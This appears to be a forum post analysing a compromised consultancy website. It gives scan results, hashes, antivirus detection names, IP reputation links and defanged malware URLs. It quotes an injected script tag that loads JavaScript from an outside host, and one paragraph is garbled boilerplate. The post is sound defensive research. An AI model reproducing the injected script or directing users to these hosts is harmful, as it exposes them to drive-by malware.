Is this malicious external link detected?

See: Result for 2014-10-31 13:09:20 UTC
Website: htxp://www.hadadconsultores.com
Checked URL: htxp://www.hadadconsultores.com/
Active suspicious connections detected:
htxp://hanna-ewa-paluszkiewicz-2.strefa.pl/display.php
Re: https://www.virustotal.com/nl/url/fc3c82a0f01f8a71de90dd7d80a178e60db816732fa8fe2facba3736ccac90f0/analysis/1414763540/
/index.html
Severity: Malicious
Reason: Detected encoded JavaScript code commonly used to hide malicious behaviour.
Details: Malicious
Offset: 5422
Threat dump: [[<scripttype="text/javascript"src=“htxp://revmaster.site90.net/promo.php”>]]
See: http://jsunpack.jeek.org/?report=4364fe27c669094a459dba28ed991df93d8d9c6a
Above link for security rearch only, open in browser with NoScript avtive and in a sandbox, VM. - degraded script tags.
Threat dump MD5: E6FEF24BA391E6AFBD342A51288FE67E
File size[byte]: 14786
File type: HTML
Page/File MD5: 108235BA67EFCFCC263EAA431AFAF2FC
Scan duration[sec]: 0.044000
System Details:
Running on: INPL
Blacklisted by Google Safebrowsing and Norton’s. - Drive-by-downlaod

polonus

IP badness history: https://www.virustotal.com/nl/ip-address/209.188.89.84/information/
62 other websites on this same IP address: http://sameid.net/ip/209.188.89.84/
main domains: http://host.analyzer.cc/ip/209.188.89.84
complaints lodged for IP: http://www.liveipmap.com/209.188.89.84
W32.HfsIframe.6ddb malcode up and alive according to clean MX: http://www.worldguide.pt/clean-mx/viruses.php?domain=hosteriadelamauta.com&sort=id%20DESC
Fireworks 8 Dreamweaver 8 target Attacked via text/javascript" language=“javascript” src=" through Script/Exploit.Kit via FTP maltraffic.
Might not be an exploit for. Malcode on site status LONG OVERDUE! on and active for over 5226 hours already!
Server software outdated and vulnerable: Apache/2.4.10 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Sucuri has the detections: http://sitecheck.sucuri.net/results/www.hadadconsultores.com
IWA undefined variable iwa → Incorrect file associations could be the result of underlying issues within your PC system. As such it is highly recommended to , unused processes and other unfavourable system settings to identify slowdown issues.
Google Safebrowsing blocked this going to malware:
htxp://hanna-ewa-paluszkiewicz-2.strefa.pl/display.php%22%3E%3C/script%3E%3C!–/1229f2–%3E
http://jsunpack.jeek.org/?report=535520dd857de3f4f670c0f8c80233af786859e2
Above link for security research only open link with NoScript acrive and in a VM/sandbox.
Results from scanning URL: htxp://hanna-ewa-paluszkiewicz-2.strefa.pl
Number of sources found: 11
Number of sinks found: 29

Results from scanning URL: htxp://revmaster.site90.net/promo.php (undefined variable adParams)
Number of sources found: 4
Number of sinks found: 99

Then there is this detection: Trojans detected:
Object: htxp://beckamaggie.krovatka.su/
SHA1: 6687bc9cd045749d473c381afb8a5674b6727f0e
Name: TrojWare.JS.Agent.JN
See: https://www.virustotal.com/nl/url/f80a7b056f19ae86dcdd311aed2e06687af70a37e839060ec0a45ed5d3553f55/analysis/1414770076/
IP badness history: https://www.virustotal.com/nl/ip-address/80.68.248.74/information/
Does avast! detects? Here they are flagged:
AVG JS/Agent 20141029
Comodo TrojWare.JS.Agent.JN 20141029
Cyren JS/Agent.QW 20141029
F-Prot JS/Agent.QW 20141029
Fortinet JS/Agent.IYB!tr 20141029
Ikarus Trojan.JS.Agent 20141029
McAfee JS/Crypt 20141029
McAfee-GW-Edition JS/Crypt 20141029
Norman AgentHow.A 20141029

Detection may be one year old?

List of referenced blacklisted domains/hosts: 5
-ad.adriver.ru
-www.tns-counter.ru
-quote.rbc.ru
-qip.ru
-r.qip.ru

pol